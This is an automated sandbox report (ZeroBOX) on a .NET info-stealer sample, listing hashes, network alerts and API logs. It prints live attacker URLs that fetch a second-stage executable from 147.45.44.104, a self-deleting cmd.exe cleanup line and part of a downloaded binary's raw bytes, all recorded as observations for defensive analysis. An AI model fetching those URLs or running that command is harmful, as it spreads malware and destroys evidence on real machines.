popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

66e7df2dec2db_vnasdsadl.exe

Client SW User Data Stealer LokiBot info stealer ftp Client Antivirus Malicious Library Code injection HTTP PWS Internet API Http API .NET EXE PE32 PE File AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 17, 2024, 1:39 p.m. Sept. 17, 2024, 1:48 p.m.
Size 135.5KB
Type PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 458d31ecc5a490d5bda8d52e7ca8a5b6
SHA256 d574de9b5d8f74451207c6b4f2b6f63e1b58f8d8f50dc03a722638c866a41f50
CRC32 8F490706
ssdeep 3072:f5zF1UvqLHTCCrSIpnwF8vIzKJjGjssSDrI8pSQbAAmVBVa5GKYzEO:71zLN+WvnHsSv1zJmV2SEO
PDB Path c:\rebexihmjg\obj\Release\' .pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Antivirus - Contains references to security software
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
t.me
A 149.154.167.99
149.154.167.99
api.ipify.org
A 104.26.13.205
A 172.67.74.152
A 104.26.12.205
104.26.13.205
steamcommunity.com
A 104.74.170.104
104.75.41.21
IP Address Status Action
104.26.12.205 Active Moloch
104.74.170.104 Active Moloch
147.45.44.104 Active Moloch
149.154.167.99 Active Moloch
164.124.101.2 Active Moloch
78.47.207.136 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:64894 -> 8.8.8.8:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 149.154.167.99:443 -> 192.168.56.103:49172 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 104.26.12.205:80 2021997 ET POLICY External IP Lookup api.ipify.org Device Retrieving External IP Address Detected
TCP 192.168.56.103:49171 -> 149.154.167.99:443 2041933 ET INFO Observed Telegram Domain (t .me in TLS SNI) Misc activity
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49171 -> 149.154.167.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49171 -> 149.154.167.99:443 2041933 ET INFO Observed Telegram Domain (t .me in TLS SNI) Misc activity
TCP 147.45.44.104:80 -> 192.168.56.103:49166 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 78.47.207.136:443 -> 192.168.56.103:49177 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 104.74.170.104:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49165 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49165 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.44.104:80 -> 192.168.56.103:49165 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 149.154.167.99:443 2041933 ET INFO Observed Telegram Domain (t .me in TLS SNI) Misc activity
TCP 192.168.56.103:49170 -> 149.154.167.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49170 -> 149.154.167.99:443 2041933 ET INFO Observed Telegram Domain (t .me in TLS SNI) Misc activity
TCP 192.168.56.103:49171 -> 149.154.167.99:443 2041933 ET INFO Observed Telegram Domain (t .me in TLS SNI) Misc activity
TCP 192.168.56.103:49170 -> 149.154.167.99:443 2041933 ET INFO Observed Telegram Domain (t .me in TLS SNI) Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49174
104.74.170.104:443 		C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com 10:20:2b:ee:30:69:cc:b6:ac:5e:47:04:71:ca:b0:75:78:51:58:f5

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

 buffer: Person 0
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 1
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 2
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 3
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 4
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 5
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 6
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 7
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 8
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 9
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 10
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 11
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 12
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 13
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 14
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 15
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 16
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 17
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 18
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 19
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 20
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 21
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 22
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 23
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 24
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 25
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 26
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 27
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 28
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 29
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 30
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 31
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 33
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 34
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 35
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 36
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 37
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 38
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 39
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 40
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 41
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 42
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 43
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 44
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 45
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 46
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 47
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 48
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Person 49
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path c:\rebexihmjg\obj\Release\' .pdb
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayVersion
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/prog/66e7dde32d7a4_vdsfg.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/get.php?ip=175.208.134.152
suspicious_features GET method with no useragent header suspicious_request GET https://steamcommunity.com/profiles/76561199768374681
request GET http://api.ipify.org/
request GET http://147.45.44.104/prog/66e7dde32d7a4_vdsfg.exe
request GET http://147.45.44.104/get.php?ip=175.208.134.152
request GET https://steamcommunity.com/profiles/76561199768374681
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 1376256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00640000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00322000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00355000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0035b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00357000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0033c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0032a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02311000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00570000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2308
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2308
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f82000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b70000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00432000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00575000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00577000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2308
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02772000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76971000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74fc1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00390000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74721000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74701000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74361000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bf1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73241000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x731e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x730e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73091000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73071000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73051000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000043b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
cmdline "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
cmdline C:\Windows\System32\cmd.exe /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
file C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
file C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
file C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
wmi
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000005bc
process_name: pw.exe
process_identifier: 760
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: taskhost.exe
process_identifier: 300
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: SearchProtocolHost.exe
process_identifier: 1072
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: conhost.exe
process_identifier: 1880
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: RegAsm.exe
process_identifier: 2400
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: svchost.exe
process_identifier: 2600
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: mscorsvw.exe
process_identifier: 2628
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: mscorsvw.exe
process_identifier: 2672
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: sppsvc.exe
process_identifier: 2720
1 1 0

Process32NextW

 snapshot_handle: 0x000005bc
process_name: WmiPrvSE.exe
process_identifier: 2784
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÇÝçfà  < [ `@  `…´ZW`H(&€ |Y  H.text; < `.rsrc`>@@.reloc €F@BðZH˜Iä‹F7c ˆùm ³ Z †¥þ êÃõû’ ó¯¦w¿ªQ˜äø­)2­¶Ÿku|ò÷âE¯ÙL§y…Y0æV'«Ï³årz@Òºµ2…xoì4¹ÈÛÍ G;ú\Q}€ÁÉìLÛ_²:Íi¯·%ĞA¾‘8(0:ŸÂ š—ãÌ~²Bû’ÞUŒ1°Ëµ1Êg&›5@süS_ë{æÕ»¶¼Þ8ÅPRJ«—ÀG½z¡û4ñ1tÅ+c¨>á˜`—>0‹BÞDOTÚm}Ys,›²™ßr¬éô—)j†[ú1¯FÍ÷çb¨–ú3.䨠IºœJcÝ £W,ÁåÖmŕâþ|G†6qøÑÅ yq}×= š’9Bpyv¹©@˜ô^Ë®ãâiëL¹õGØÿK5 @÷ºÊê¦V(z¾ð3Û Ô¥þDj¥ëȄýB,<+M«%/¯â(½A)Q¯ÎàƳ‘W1-ȞŽ}Ï Ýï¥ÇLbT ¨Ð°kŸÀ[5„¦Ô.žnŠH=µ|É=œâb!OÕ"*Û~<¤h ‹ŸTºþ4-®Ï›šÓu+úøEª„ˆ.¼WͳãöG·"¸®ñäKp¦„£“®Í Fþš±ž¯T )ç¸F¶ï—¬ÂsÕ\ hjû¥ÀE_¶.(öZnï)қ Q$ƒ$.êÚñv—ìÏ'P³&DGÃRéŠÅ‹»qVö(6¥(ìTÐÚ÷; ®I9”ZŸ‘›<ó>ǓV;æ4Ӂ`%ƒØ½·Hlg:ïqÞ¼‡×E(\úGãA—Ä¡ðì ÍêÁàªÜ°º/Õ'¹”EÒ¶ EÒ *ç;PY‚/ñÜéK{§–Hóâ¾Ô…ƪ*ððzñ‹%O”G"Ö>´ Ž‹xùÄ>íÈ«Bß´ü+ «¯úӟ*ló<ÊC«ȃ'–عé1Uõ鋈JüßU˜3Tk( 6€äú^8²ÓV7Êž^Çñr,Ó£›JgMΘ³µAvçzűz\åÁ‹hú%EŒJvy´ÐçUzûǤ‰ö7pæúÚ±ò{#3c[¥6¸]+“D”°‰[¢ó\Dñü£ßÅ5%Uâæ«7‘„VvBÅù“½þZN%yq8Î ó§²pHN ”¬íí%-:Ü¿E;ƒzž çæfg|¼{‚#÷C¦<g›ôo¸ÔËcÜYà)DréîuJo¿1$ލ=¼>ìZ¢»Ö{–Ÿúø­Ð4½(ó ²Œ&¯Aö7zQO<ÜMŒôxømúç%›‹ßðks(‚àßBGĜÍ\rÌ¡ †—`ÔMMgá?i IaR†Æè“Èuş#TK9.àÇRÀ5—wqôu _3äÚSðwrJæÃ`YâiÜšß]fÎñ²TòØ-è`‚bÇ>žjº7ÒüO£èü]ƒĦã}íÕs³š‹WyùYòž á[©@–k±‡Ś$8­÷ã ^ôcpZ¢ÿZí«\ÿ)w%Žü÷§8 ËdìëÚèë¡çªÏ‘Õ~sO ?fWÆæüÀnS¶]Ÿ«» É(Մ'`7+¼ÉÄ_Kq›ò̈́C*¤é"#zo€,AdÃÜqåö$k…–ÅõÕy¬h8³:“Ðuú)W|¨,W¢hí³Uj+Bå>`‰m3Ø ¶¤&DÞ\ÚJ&¢§ßª8[ÒæVò…ÐT×KO.F£ é©n­À®L(;þ:‚„Ö ‚QÐҏµto„_j_RL€äæDБï˜TÐ4BŠ.×Hö6ºÄ÷ý[9ÁÇvnœÑº%ŠÇ‘?ЩåÍåÛû¶ëmgzìzú¸Ùµ‚‹>L¢¨X`Øt~ïÙ¸œ'=5‹ûj¸»#`7"tBÄ+@±´(Qq‡üŠÄèbV»¼|”»ã ¬Uݾš6nbRR¦Mp æáì–§@•LÀ9ú©œåÅp»¹Á É(¬t¤Ñ º«™¡õšïI®Ñ_BXºŸgâÔ k=¡xÆm'b b:yÒùÆ ƒŒÐËyÄÀ—©õ´ô $üoäewV(µug`ôÆÂéEÄi²*-D ë Q"H2ZfãüZü “—v³¨ÙÄdœ€C–Næ‡õŠ” - ÓFuâðñyðlO&'“Ä‘7§¹ìd Ú7ÌÄ=²©¼vo¶™W¨Ï_wÕÞ›Ë0òYã÷¥k¢´€k2ÚÉ¥ŒŽeÆתÖ%âJ•ÒÕ¢dñ«mÕ²N4Ö9¼«_>èå¼JrĈ¶üú5ÿ >d•»³õ¾iI]UtJG§¢#ÆÀ¤ËKC¼ÅÕ^éôvÜ}÷pzÑiUkÚ{~Ž ð¤%\“Á´±’ÍÞôvrÉ60¤M®:ùþ—þ ùÌ}½HªßªÃ°ò7Wþ‰¶µ¿q‡Õ€èÂÚ¥îþÐúèH-wß5­*¶%B ÝƊàøÅÎjSAnFjJ„  ³— 7ßE¢³iÌÁÓqëìE¬˜87)iÌ7û?à2}i"¹lw{FŸÙ`cücX‚ÍE™*&ˆë`ËÒ"ñøàX{ðsmÌåá.é<Tã…oM„¦ o·FúêÚjºø¥¿ECÃ0ˆRC<:TcRw…iò¬ÄƐ!½æYJš¥è_ۋE=. 